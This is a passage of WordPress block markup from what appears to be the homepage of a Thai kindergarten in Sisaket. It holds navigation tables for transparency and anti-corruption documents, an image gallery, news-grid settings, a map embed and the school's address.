eWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"abc6c06d\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong>ข้อมูลผู้บริหาร</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1H4PRZlpAa4ZD6uq6Ew5Wx3nLXGcUNa09/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong>ข้อมูลการติดต่อ</strong></td></tr><tr><td><strong>ข่าวประชาสัมพันธ์</strong></td></tr><tr><td><strong>Q&amp;A</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong>E-Service</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 